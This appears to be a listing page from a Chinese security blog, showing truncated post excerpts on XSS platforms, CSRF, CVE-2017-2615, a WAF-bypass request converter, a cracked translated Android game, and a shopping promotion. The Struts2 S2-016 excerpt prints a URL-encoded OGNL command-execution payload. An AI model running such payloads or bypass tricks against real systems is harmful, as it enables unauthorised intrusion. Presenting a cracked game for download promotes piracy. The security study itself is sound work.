本博客加密文章何时公开说明(此文会列出曾经加密现已公开的文章)

本博客加密文章何时公开说明(此文会列出曾经加密现已公开的文章)
(此文会列出曾经加密现已公开的文章) 有很多朋友私信我说加密文章的密码,其实因为有些问题我没有提交给对方SRC,所以对方可能也暂时没有修复,所以我这边才加密的。不过,很多文章本人也在一点点的去除限制密码。有一些问题是刚刚提交到对方SRC,只要对方成功修复了,我这边就会立刻公开文章。 其实看文章个人认为主要就是学习思路。有一些文章很水,没办法,漏洞本身就是...

《命运之石 SOL Stone of Life》1.26 汉化中文破解版 第一版本

《命运之石 SOL Stone of Life》1.26  汉化中文破解版 第一版本
前几天无意中找到了一款非常非常好玩的安卓单机游戏,是SOL Stone of Life,中文名《命运之石》,但是找了半天破解版发现国内的都是版本非常的低,都是1.1几的版本,现在最新版本已经是 1.26了。找了很多国外的版本发现有最新的破解版本,但是全都是英文,玩起来太累了。这里我就花了整整一天半的时间来汉化,汉化的还是很渣渣,不过算是第一汉化版本吧。以后如果有时间再继...

CVE-2017-2615 cirrus vga 漏洞POC及复习过程

CVE-2017-2615 cirrus vga 漏洞POC及复习过程
--------------------------------------------------------------------------------------------------- 另提供CVE-2017-2615漏洞成因分析文章:http://coao.co/2972.html --------------------------------------------------------------------------------------------------- 首先应该在linux下执行命: lspci,如果vga型号为cirrus会存在问题 vga型号为cirrus会存在...

Xss平台详细使用教程

Xss平台详细使用教程
请仔细查看本文,相信你讲对XSS平台有另类的了解,注意是【仔细查看本文】!!! 首先登录XSS平台,进入 Xss平台之后是如下界面。  (以下所有图片点击都可以查看大图或原图)。 XSS平台登陆后界面 登录进去后,首先要创建一个项目。这个项目主要是为了标记你想测试某个网站。如下图: 创建XSS平台项目 点击创建项目之后如下图: 创建项目第一步(注意看图方框中内容) 然后点击...

双11 薅”苏宁”羊毛 来晚就没喽

双11 薅”苏宁”羊毛 来晚就没喽
双11 苏宁 薅羊毛 攻略 首先进入活动地址:https://sale.suning.com/jr/lcd11lqbpc/index.html 然后找到下面点击一下【学习理财知识】如下图,一定要点击一下呦。 学习理财小知识 然后在回到上方,点击【立即领取】,如下图: 点击领取 然后会跳转到你苏宁的充值界面,这个是往“零钱宝”里面冲钱,类似于支付宝里面的“余额宝”,往里面冲100元钱,最少要冲100喔,不要有任何担...

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given 解决方法–解决方案

Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given  解决方法–解决方案
今天在用php7.0版本的时候,XSS平台报错,如下: Warning: mysqli_fetch_assoc() expects parameter 1 to be mysqli_result, boolean given in 出错代码如下: 1 2 3 4 5 $this->queryId=mysqli_query($this->linkId,$sql); while($row=mysqli_fetch_assoc($this->queryId)){ $this->rows[]=$row; } $this->...

CSRF 跨站请求伪造 攻击与防御 — CSRF防御策略

CSRF 跨站请求伪造 攻击与防御  —  CSRF防御策略
看过程能让你更了解如何的安全编码,看文中红字结果让你知道防范措施。 什么是CSRF 跨站请求伪造 CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 那么CSRF到底能够干嘛呢?你可以这样简单的理解:攻击者可以盗用你的登陆信息,以你的身份模拟发送各种请求。攻击者只要借助少许的社会工程学...

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本

密码保护:Post、Get数据包转为上传multipart/form-data格式数据包php脚本
Post、Get数据包转为上传multipart/form-data格式数据包php脚本 说一下写这个工具的初衷吧。有很多时候某些程序接收参数的方式都是通用的,那咱们就可以利用这种方式来绕过WAF等验证来进行攻击。 只需要转换一下格式即可。 在线转换地址:http://gdd.gd/multipart.php Burp Post、Get数据包在线转换工具 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 2...

密码保护:另类执行Struts2命令 及 SQL注入

密码保护:另类执行Struts2命令 及 SQL注入
先说一下Struts2 2013 S2-016的测试payload代码是如下的。 GET /xxxxxxx/rf/userAction!login.action?redirect:$%7B%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27whoami%27%7D%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%...